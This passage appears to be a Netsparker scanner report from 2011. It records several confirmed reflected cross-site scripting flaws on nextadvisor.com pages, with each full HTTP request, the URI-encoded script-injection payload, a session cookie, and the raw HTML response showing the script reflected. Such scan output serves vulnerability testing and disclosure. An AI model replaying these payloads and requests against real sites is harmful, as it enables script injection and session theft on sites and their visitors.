more information about Internet Security Software:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="internet_security_software"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 
href="/link.php?kw=..
- /online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000356)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000356)%3C/script%3E

/online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000356)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000356)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000356)</script>

Request

GET /online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000356)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_tax_preparation_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:12 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6483
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", tax preparation, efile, tax online, taxes online, irs, federal tax return, state tax return, online tax preparation, tax prep, 1040, 1040ez, electronic file, free federal tax return, H&R Block, TurboTax, TaxAct, CompleteTax, E-File Tax Returns, TaxSimple" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_tax_preparation_services/'"--></style></script><script>netsparker(0x000356)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent 
source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual 
Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000356)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = 
showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_tax_preparation_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Tax Preparation and Filing FAQ</h1> <p>Frequently Asked Questions about Online Tax Preparation and Filing</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Tax Preparation and Filing:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" 
name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_tax_preparation_services"> <input type="hidden" name="FieldData4" 
..
/virtual_phone/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000368)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000368)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/virtual_phone/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000368)</script>

Request

GET /virtual_phone/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000368)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/virtual_phone/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:17 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6380
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", virtual phone, virtual phone number, virtual pbx, virtual office, virtual attendant,, Phone.com, eVoice, Ring Central, FreedomVoice, Nextiva Connect" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/virtual_phone/'"--></style></script><script>netsparker(0x000368)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start 
Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web 
Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000368)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && 
showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/virtual_phone_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Virtual Phone & Virtual Office FAQ</h1> <p>Frequently Asked Questions about Virtual Phone & Virtual Office</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Virtual Phone & Virtual Office:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> 
<input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="virtual_phone"> <input type="hidden" name="FieldData4" 
..
/voip_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000376)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000376)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/voip_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000376)</script>

Request

GET /voip_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000376)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/voip_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:20 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 7011
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", voip review, voip services reviews, voip service review, voip, internet phone service, internet phone service price, broadband phone information, long distance phone services, Vonage, VOIPo, Phone Power, Phone.com, ViaTalk, VYL Media, Lingo, Skype Phone" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/voip_services/'"--></style></script><script>netsparker(0x000376)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for 
comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option 
value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000376)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">All VoIP</a> <span class="nav_border">|</span> <a href="compare.php">Home VoIP</a><span class="nav_border">|</span> <a href="small_business_voip.php">Business VoIP</a><span class="nav_border">|</span> <a href="/voip_services/other_voip.php">Other VoIP</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" 
src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/voip_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> VoIP FAQ</h1> <p>Frequently Asked Questions about VoIP</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about VoIP:</strong></p></span> <form 
action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="voip_services"> <input type="hidden" name="FieldData4" 
